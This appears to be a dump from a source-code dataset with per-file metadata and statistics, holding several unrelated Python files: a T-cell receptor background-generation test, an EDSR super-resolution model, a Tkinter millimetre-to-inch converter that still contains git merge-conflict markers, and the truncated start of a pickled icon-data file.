alfalfa/action_imports.py
|
electronhead/alfalfa
|
6098a87c88b0ae6aff8c8f6d41b924d293500e62
|
[
"MIT"
] | null | null | null |
import alfalfa.gpio_action
import alfalfa.action
| 24
| 26
| 0.895833
| 7
| 48
| 6
| 0.571429
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 48
| 2
| 27
| 24
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9a5f32f9db567a73eedc39029e486674c6fb46d
| 6,087
|
py
|
Python
|
tcrdist/tests/test_background.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 26
|
2020-12-28T17:37:01.000Z
|
2022-01-29T01:31:13.000Z
|
tcrdist/tests/test_background.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 31
|
2020-08-17T22:17:57.000Z
|
2022-03-18T23:47:34.000Z
|
tcrdist/tests/test_background.py
|
agartland/tcrdist3
|
34f8d50e7448b2bf7cf7cd9ab9a2d80759f47240
|
[
"MIT"
] | 7
|
2020-08-18T23:55:40.000Z
|
2021-09-22T18:15:54.000Z
|
"""
This is an integration test of the major features in background.py
"""
import os
import pytest
__all__ = ['test_background_generation_in_mira_60']
def test_background_generation_toy_example():
import sys
import os
import numpy as np
import pandas as pd
from tcrsampler.sampler import TCRsampler
from tcrdist.background import make_gene_usage_counter, get_gene_frequencies, calculate_adjustment, make_gene_usage_counter
from tcrdist.background import make_vj_matched_background, make_flat_vj_background
from tcrdist.background import get_stratified_gene_usage_frequency
from tcrdist.background import sample_britanova
"""
SUPPOSE WE HAVE SOME REPERTOIRE WITH THE FOLLOWING GENE USAGE SPECIFIED BY ix
< df_target > For testing we will use a set of 25 TCRs generated from rare and semi-rare V,J pairings. We use 25 only
because we will be comuting distances against 4.6 Million seqs.
1. TCRsampler, replacing gene occurance frequencies with subject tratified estimates
NOTE: with replace = True .vj_occur_freq will now be the stratified value
2. Make V,J gene usage matched backgound to match usage in df_target
3. Use a subject-stratifeid random draw from the Britanova Chord Blood Samples
4. Make V,J gene usage matched backgound to match usage in df_target
"""
ts = TCRsampler(default_background = 'britanova_human_beta_t_cb.tsv.sampler.tsv') # 1
ts = get_stratified_gene_usage_frequency(ts = ts, replace = True)
ix =[['TRBV19*01', 'TRBJ2-5*01', 3],['TRBV24-1*01', 'TRBJ2-4*01', 3],['TRBV25-1*01', 'TRBJ2-4*01', 3],['TRBV30*01', 'TRBJ2-3*01', 2],['TRBV5-4*01', 'TRBJ2-3*01', 2],['TRBV11-2*01', 'TRBJ2-2*01', 2],['TRBV2*01', 'TRBJ1-5*01', 1],['TRBV12-5*01', 'TRBJ2-7*01', 1],['TRBV4-1*01', 'TRBJ1-6*01', 1],['TRBV6-5*01', 'TRBJ1-6*01', 1],['TRBV13*01', 'TRBJ2-3*01', 1],['TRBV18*01', 'TRBJ2-3*01', 1],['TRBV14*01', 'TRBJ2-7*01', 1],['TRBV6-6*01', 'TRBJ2-7*01', 1],['TRBV10-3*01', 'TRBJ2-3*01', 1],['TRBV7-2*01', 'TRBJ2-1*01', 1],['TRBV5-1*01', 'TRBJ2-1*01', 1]]
flatten = lambda l: [item for sublist in l for item in sublist]
df_target = pd.concat([pd.DataFrame({'cdr3_b_aa' : flatten(ts.sample([[x[0], x[1], x[2]]])) , 'v_b_gene':x[0], 'j_b_gene':x[1]}) for x in ix]).reset_index(drop = True)
gene_usage_counter = make_gene_usage_counter(df_target) # 2
df_vj_bkgd = make_vj_matched_background(ts = ts,
gene_usage_counter = gene_usage_counter,
size = 101000, # Ask for a few extra as Olga can return none if it makes too many non-productive CDR3s
recomb_type="VDJ",
chain_folder = "human_T_beta",
cols = ['v_b_gene', 'j_b_gene', 'cdr3_b_aa'])
df_vj_bkgd = df_vj_bkgd.sample(100000).reset_index(drop = True)
df_vj_bkgd['weights'] = calculate_adjustment(df = df_vj_bkgd, adjcol = "pVJ")
df_vj_bkgd['source'] = "vj_matched"
df_britanova_100K = sample_britanova(size = 100000) # 3
df_britanova_100K = get_gene_frequencies(ts = ts, df = df_britanova_100K)
df_britanova_100K['weights'] = 1
df_britanova_100K['source'] = "stratified_random"
df_bkgd = pd.concat([df_vj_bkgd, df_britanova_100K], axis = 0).\
reset_index(drop = True) # 4
assert df_bkgd.shape[0] == 200000
"""
Visually inspect the gene_usage between target seqs and vj-matched background
"""
df_check_match = pd.concat([df_vj_bkgd.groupby(['v_b_gene', 'j_b_gene']).size()/df_vj_bkgd.shape[0], df_target.groupby(['v_b_gene', 'j_b_gene']).size()/df_target.shape[0]], axis = 1)
assert np.all(abs(df_check_match[0] - df_check_match[1]) < 0.001)
return df_bkgd
@pytest.mark.skip(reason="This test documents an example, but is redundant. Skipped in the interest of CI time.")
def test_background_generation_in_mira_60(fn = os.path.join('tcrdist','data','covid19','mira_epitope_60_436_MWSFNPETNI_SFNPETNIL_SMWSFNPET.tcrdist3.csv')):
import sys
import os
import numpy as np
import pandas as pd
from tcrsampler.sampler import TCRsampler
from tcrdist.background import make_gene_usage_counter, get_gene_frequencies, calculate_adjustment, make_gene_usage_counter
from tcrdist.background import make_vj_matched_background, make_flat_vj_background
from tcrdist.background import get_stratified_gene_usage_frequency
from tcrdist.background import sample_britanova
"""
SUPPOSE WE HAVE SOME REPERTOIRE WITH THE FOLLOWING GENE USAGE SPECIFIED BY ix
< df_target > For testing we will use a set of 25 TCRs generated from rare and semi-rare V,J pairings. We use 25 only
because we will be comuting distances against 4.6 Million seqs.
1. TCRsampler, replacing gene occurance frequencies with subject tratified estimates
NOTE: with replace = True .vj_occur_freq will now be the stratified value
2. Make V,J gene usage matched backgound to match usage in df_target
3. Use a subject-stratifeid random draw from the Britanova Chord Blood Samples
4. Make V,J gene usage matched backgound to match usage in df_target
"""
ts = TCRsampler(default_background = 'britanova_human_beta_t_cb.tsv.sampler.tsv') # 1
ts = get_stratified_gene_usage_frequency(ts = ts, replace = True)
df_target = pd.read_csv(fn)
df_target = df_target[['v_b_gene','j_b_gene','cdr3_b_aa']]
gene_usage_counter = make_gene_usage_counter(df_target) # 2
df_vj_bkgd = make_vj_matched_background(ts = ts,
gene_usage_counter = gene_usage_counter,
size = 150000, # Ask for a few extra as Olga can return none if it makes too many non-productive CDR3s
recomb_type="VDJ",
chain_folder = "human_T_beta",
cols = ['v_b_gene', 'j_b_gene', 'cdr3_b_aa'])
df_vj_bkgd = df_vj_bkgd.sample(100000).reset_index(drop = True)
df_vj_bkgd['weights'] = calculate_adjustment(df = df_vj_bkgd, adjcol = "pVJ")
df_vj_bkgd['source'] = "vj_matched"
df_britanova_100K = sample_britanova(size = 100000) # 3
df_britanova_100K = get_gene_frequencies(ts = ts, df = df_britanova_100K)
df_britanova_100K['weights'] = 1
df_britanova_100K['source'] = "stratified_random"
df_bkgd = pd.concat([df_vj_bkgd, df_britanova_100K], axis = 0).\
reset_index(drop = True) # 4
assert df_bkgd.shape[0] == 200000
#df_bkgd.
return df_bkgd
| 52.930435
| 548
| 0.744373
| 1,011
| 6,087
| 4.232443
| 0.212661
| 0.048376
| 0.029914
| 0.050479
| 0.810703
| 0.776116
| 0.75555
| 0.75555
| 0.75555
| 0.739425
| 0
| 0.058666
| 0.140299
| 6,087
| 114
| 549
| 53.394737
| 0.759029
| 0.043535
| 0
| 0.802817
| 0
| 0
| 0.203956
| 0.041382
| 0
| 0
| 0
| 0
| 0.042254
| 1
| 0.028169
| false
| 0
| 0.28169
| 0
| 0.338028
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9a7ac27437bc2175c0682b8f27a933309998062
| 6,118
|
py
|
Python
|
EDSR/edsr.py
|
NateLol/BAM_A_lightweight_but_efficient_Balanced_attention_mechanism_for_super_resolution
|
f23c043c6cd5c064e58b6b11bd7100fc55224702
|
[
"MIT"
] | 33
|
2021-04-30T02:40:05.000Z
|
2022-03-09T09:35:49.000Z
|
EDSR/edsr.py
|
chisyliu/BAM_A_lightweight_but_efficient_Balanced_attention_mechanism_for_super_resolution
|
4c977ea1586e7836248acb5cbd648e124b43aca3
|
[
"MIT"
] | 6
|
2021-05-10T23:19:35.000Z
|
2021-12-13T02:13:16.000Z
|
EDSR/edsr.py
|
chisyliu/BAM_A_lightweight_but_efficient_Balanced_attention_mechanism_for_super_resolution
|
4c977ea1586e7836248acb5cbd648e124b43aca3
|
[
"MIT"
] | 13
|
2021-05-18T12:21:48.000Z
|
2022-01-21T07:17:19.000Z
|
import EDSR.common as common
import torch.nn as nn
from Blanced_attention import BlancedAttention
url = {
'r16f64x2': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_baseline_x2-1bc95232.pt',
'r16f64x3': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_baseline_x3-abf2a44e.pt',
'r16f64x4': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_baseline_x4-6b446fab.pt',
'r32f256x2': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_x2-0edfb8a3.pt',
'r32f256x3': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_x3-ea3ef2c6.pt',
'r32f256x4': 'https://cv.snu.ac.kr/research/EDSR/models/edsr_x4-4f62e9ef.pt'
}
def default_conv(in_channels, out_channels, kernel_size, bias=True):
return nn.Conv2d(
in_channels, out_channels, kernel_size,
padding=(kernel_size // 2), bias=bias)
# def make_model(args, parent=False):
# if args.dilation:
# from model import dilated
# return EDSR(args, dilated.dilated_conv)
# else:
# return EDSR(args)
class EDSR_blanced_attention(nn.Module):
def __init__(self, args, conv=default_conv):
super(EDSR_blanced_attention, self).__init__()
n_resblocks = args.n_resblocks_edsr # 16
n_feats = args.n_feats_edsr # 64
kernel_size = 3
scale = args.scale # 4
act = nn.ReLU(True)
self.url = url['r{}f{}x{}'.format(n_resblocks, n_feats, scale)]
self.sub_mean = common.MeanShift(args.rgb_range) # 标准化输入
self.add_mean = common.MeanShift(args.rgb_range, sign=1) # 还原输出
# define head module
m_head = [conv(args.n_colors, n_feats, kernel_size)] # channels:3->64
# define body module
m_body = [ # 16个resblock
common.ResBlock( # ## 参数:64, 3, relu, 1
conv, n_feats, kernel_size, act=act, res_scale=args.res_scale
) for _ in range(n_resblocks)
]
m_body.append(conv(n_feats, n_feats, kernel_size)) # channels:64->64
# define tail module
m_tail = [
common.Upsampler(conv, scale, n_feats, act=False), # 上采样集中在这里
conv(n_feats, args.n_colors, kernel_size)
]
self.head = nn.Sequential(*m_head)
self.body = nn.Sequential(*m_body)
self.tail = nn.Sequential(*m_tail)
self.attention=BlancedAttention(n_feats)
def forward(self, x):
# x = self.sub_mean(x)
x = self.head(x)
res = self.body(x)
res=self.attention(res)
res += x
x = self.tail(res)
# x = self.add_mean(x)
return x
def load_state_dict(self, state_dict, strict=True):
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, nn.Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
if name.find('tail') == -1:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
if name.find('tail') == -1:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
class EDSR(nn.Module):
def __init__(self, args, conv=common.default_conv):
super(EDSR, self).__init__()
n_resblocks = args.n_resblocks # 16
n_feats = args.n_feats # 64
kernel_size = 3
scale = args.scale # 4
act = nn.ReLU(True)
self.url = url['r{}f{}x{}'.format(n_resblocks, n_feats, scale)]
self.sub_mean = common.MeanShift(args.rgb_range) # 标准化输入
self.add_mean = common.MeanShift(args.rgb_range, sign=1) # 还原输出
# define head module
m_head = [conv(args.n_colors, n_feats, kernel_size)] # channels:3->64
# define body module
m_body = [ # 16个resblock
common.ResBlock( # ## 参数:64, 3, relu, 1
conv, n_feats, kernel_size, act=act, res_scale=args.res_scale
) for _ in range(n_resblocks)
]
m_body.append(conv(n_feats, n_feats, kernel_size)) # channels:64->64
# define tail module
m_tail = [
common.Upsampler(conv, scale, n_feats, act=False), # 上采样集中在这里
conv(n_feats, args.n_colors, kernel_size)
]
self.head = nn.Sequential(*m_head)
self.body = nn.Sequential(*m_body)
self.tail = nn.Sequential(*m_tail)
def forward(self, x):
# x = self.sub_mean(x)
x = self.head(x)
res = self.body(x)
res += x
x = self.tail(res)
# x = self.add_mean(x)
return x
def load_state_dict(self, state_dict, strict=True):
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
if isinstance(param, nn.Parameter):
param = param.data
try:
own_state[name].copy_(param)
except Exception:
if name.find('tail') == -1:
raise RuntimeError('While copying the parameter named {}, '
'whose dimensions in the model are {} and '
'whose dimensions in the checkpoint are {}.'
.format(name, own_state[name].size(), param.size()))
elif strict:
if name.find('tail') == -1:
raise KeyError('unexpected key "{}" in state_dict'
.format(name))
| 37.765432
| 96
| 0.539229
| 742
| 6,118
| 4.25876
| 0.180593
| 0.036076
| 0.018987
| 0.022785
| 0.82943
| 0.82943
| 0.798418
| 0.761076
| 0.761076
| 0.726899
| 0
| 0.027081
| 0.348153
| 6,118
| 161
| 97
| 38
| 0.765296
| 0.090389
| 0
| 0.730435
| 0
| 0.052174
| 0.14656
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06087
| false
| 0
| 0.026087
| 0.008696
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9b16fe5d7103844f306cd89f3809c253a75dea3
| 7,596
|
py
|
Python
|
ConvertMM.py
|
JonRob812/GimmeInches
|
51652d1e49a99455619ad3d82e24a7085cc55dfd
|
[
"Apache-2.0"
] | null | null | null |
ConvertMM.py
|
JonRob812/GimmeInches
|
51652d1e49a99455619ad3d82e24a7085cc55dfd
|
[
"Apache-2.0"
] | null | null | null |
ConvertMM.py
|
JonRob812/GimmeInches
|
51652d1e49a99455619ad3d82e24a7085cc55dfd
|
[
"Apache-2.0"
] | null | null | null |
<<<<<<< HEAD
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 4.26
# in conjunction with Tcl version 8.6
# Dec 30, 2019 03:32:14 PM PST platform: Windows NT
import sys
import os
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import ConvertMM_support
def vp_start_gui():
'''Starting point when module is the main routine.'''
global val, w, root
root = tk.Tk()
ConvertMM_support.set_Tk_var()
top = Toplevel1 (root)
ConvertMM_support.init(root, top)
root.mainloop()
def destroy_Toplevel1():
global w
w.destroy()
w = None
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
class Toplevel1:
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#000000' # X11 color: 'black'
_fgcolor = '#838383' # Closest X11 color: 'gray51'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
font19 = "-family Consolas -size 12 -weight normal -slant " \
"roman -underline 0 -overstrike 0"
font20 = "-family {Courier New} -size 16 -weight bold -slant " \
"roman -underline 0 -overstrike 0"
top.geometry("213x133+905+93")
top.minsize(350, 1)
top.maxsize(3844, 1061)
top.resizable(1, 1)
top.title("Gimme Inches")
top.iconbitmap(resource_path('mmicon.ICO'))
top.configure(background="#000000")
self.Entry1 = tk.Entry(top)
self.Entry1.place(relx=0.15, rely=0.35, height=40, relwidth=0.7)
self.Entry1.focus_set()
self.Entry1.configure(background="#000000")
self.Entry1.configure(disabledforeground="#a3a3a3")
self.Entry1.configure(font=font20)
self.Entry1.configure(foreground="#7638BB")
self.Entry1.configure(highlightbackground="#000000")
self.Entry1.configure(selectbackground="#000000")
self.Entry1.configure(selectforeground="#38B1BB")
self.Entry1.configure(insertbackground="#000000")
self.Entry1.configure(justify='center')
self.Entry1.configure(textvariable=ConvertMM_support.inputVAR)
self.Entry1.bind('<Return>', ConvertMM_support.enter)
self.Input_Text = tk.Label(top)
self.Input_Text.place(relx=0.5, rely=0.2, height=20, anchor='center')
self.Input_Text.configure(background="#000000")
self.Input_Text.configure(font=font19)
self.Input_Text.configure(foreground="#7638BB")
self.Input_Text.configure(textvariable=ConvertMM_support.Input_Text_Var)
# self.Button1 = tk.Button(top)
# self.Button1.place(relx=0.15, rely=0.526, height=40, width=149)
# self.Button1.configure(activebackground="#730e8c")
# self.Button1.configure(activeforeground="white")
# self.Button1.configure(activeforeground="#838383")
# self.Button1.configure(background="#000000")
# self.Button1.configure(command=ConvertMM_support.gimmeInches)
# self.Button1.configure(disabledforeground="#a3a3a3")
# self.Button1.configure(font=font19)
# self.Button1.configure(foreground="#838383")
# self.Button1.configure(highlightbackground="#000000")
# self.Button1.configure(highlightcolor="black")
# self.Button1.configure(pady="0")
# self.Button1.configure(text='''Gimme Inches''')
if __name__ == '__main__':
vp_start_gui()
=======
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 4.26
# in conjunction with Tcl version 8.6
# Dec 30, 2019 03:32:14 PM PST platform: Windows NT
import sys
import os
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import ConvertMM_support
def vp_start_gui():
'''Starting point when module is the main routine.'''
global val, w, root
root = tk.Tk()
ConvertMM_support.set_Tk_var()
top = Toplevel1 (root)
ConvertMM_support.init(root, top)
root.mainloop()
def destroy_Toplevel1():
global w
w.destroy()
w = None
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
class Toplevel1:
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#000000' # X11 color: 'black'
_fgcolor = '#838383' # Closest X11 color: 'gray51'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
font19 = "-family Consolas -size 16 -weight normal -slant " \
"roman -underline 0 -overstrike 0"
font20 = "-family {Courier New} -size 16 -weight bold -slant " \
"roman -underline 0 -overstrike 0"
top.geometry("213x133+905+93")
top.minsize(350, 1)
top.maxsize(3844, 1061)
top.resizable(1, 1)
top.title("Gimme Inches")
top.iconbitmap(resource_path('mmicon.ICO'))
top.configure(background="#000000")
self.Entry1 = tk.Entry(top)
self.Entry1.place(relx=0.15, rely=0.35,height=40, relwidth=0.7)
self.Entry1.focus_set()
self.Entry1.configure(background="#000000")
self.Entry1.configure(disabledforeground="#a3a3a3")
self.Entry1.configure(font=font20)
self.Entry1.configure(foreground="#999999")
self.Entry1.configure(highlightbackground="#730e8c")
self.Entry1.configure(insertbackground="#730e8c")
self.Entry1.configure(justify='center')
self.Entry1.configure(textvariable=ConvertMM_support.inputVAR)
self.Entry1.bind('<Return>', ConvertMM_support.enter)
# self.Button1 = tk.Button(top)
# self.Button1.place(relx=0.15, rely=0.526, height=40, width=149)
# self.Button1.configure(activebackground="#730e8c")
# self.Button1.configure(activeforeground="white")
# self.Button1.configure(activeforeground="#838383")
# self.Button1.configure(background="#000000")
# self.Button1.configure(command=ConvertMM_support.gimmeInches)
# self.Button1.configure(disabledforeground="#a3a3a3")
# self.Button1.configure(font=font19)
# self.Button1.configure(foreground="#838383")
# self.Button1.configure(highlightbackground="#000000")
# self.Button1.configure(highlightcolor="black")
# self.Button1.configure(pady="0")
# self.Button1.configure(text='''Gimme Inches''')
if __name__ == '__main__':
vp_start_gui()
>>>>>>> 1bda16814c81dcc21fcb2be16797f231b787264e
| 33.170306
| 80
| 0.652975
| 898
| 7,596
| 5.424276
| 0.226058
| 0.063231
| 0.098542
| 0.041675
| 0.886882
| 0.886882
| 0.886882
| 0.886882
| 0.886882
| 0.886882
| 0
| 0.080825
| 0.221432
| 7,596
| 228
| 81
| 33.315789
| 0.742814
| 0.267509
| 0
| 0.859259
| 1
| 0
| 0.125746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.014815
| 0.133333
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d9e2471a73fdf5bfa69cee438e8fc9a3ef5d99cb
| 140
|
py
|
Python
|
tests/test_common/test_utils/__init__.py
|
gchhablani/code-soup
|
eec666b6cd76bad9c7133a185bb85021b4a390f0
|
[
"MIT"
] | 18
|
2021-07-29T16:21:02.000Z
|
2021-12-13T12:58:15.000Z
|
tests/test_common/test_utils/__init__.py
|
gchhablani/code-soup
|
eec666b6cd76bad9c7133a185bb85021b4a390f0
|
[
"MIT"
] | 93
|
2021-08-04T02:48:15.000Z
|
2022-01-16T04:58:51.000Z
|
tests/test_common/test_utils/__init__.py
|
gchhablani/code-soup
|
eec666b6cd76bad9c7133a185bb85021b4a390f0
|
[
"MIT"
] | 27
|
2021-08-06T06:51:34.000Z
|
2021-11-02T05:47:18.000Z
|
from tests.test_common.test_utils.test_checkpoints import TestCheckpoints
from tests.test_common.test_utils.test_seeding import TestSeeding
| 46.666667
| 73
| 0.9
| 20
| 140
| 6
| 0.5
| 0.15
| 0.216667
| 0.316667
| 0.533333
| 0.533333
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0.057143
| 140
| 2
| 74
| 70
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9fe7f848e8187420fedd8d6901ee9075692d88a
| 65,632
|
py
|
Python
|
uavcan_gui_tool/thirdparty/pyqtgraph/pixmaps/pixmapData_2.py
|
PonomarevDA/inno_uavcan_VTOL_interface
|
76bea66096f1eff72ccc8302b15b6844a66edb2d
|
[
"MIT"
] | null | null | null |
uavcan_gui_tool/thirdparty/pyqtgraph/pixmaps/pixmapData_2.py
|
PonomarevDA/inno_uavcan_VTOL_interface
|
76bea66096f1eff72ccc8302b15b6844a66edb2d
|
[
"MIT"
] | null | null | null |
uavcan_gui_tool/thirdparty/pyqtgraph/pixmaps/pixmapData_2.py
|
PonomarevDA/inno_uavcan_VTOL_interface
|
76bea66096f1eff72ccc8302b15b6844a66edb2d
|
[
"MIT"
] | null | null | null |
pixmapData = {
'lock.png': "cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I32\nI32\nI4\ntp6\ncnumpy\ndtype\np7\n(S'u1'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xad\\xad\\xad\\x19\\xa8\\xa8\\xa8\\x8d\\xa9\\xa9\\xa9\\xc1\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xaa\\xaa\\xaa\\xc2\\xa9\\xa9\\xa9\\x8e\\xad\\xad\\xad\\x19\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xa8\\xa8\\xa8X\\xa9\\xa9\\xa9\\xed\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xed\\xa8\\xa8\\xa8X\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x